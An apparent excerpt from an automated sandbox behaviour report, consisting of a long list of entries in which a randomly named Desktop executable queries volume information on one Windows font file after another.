Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
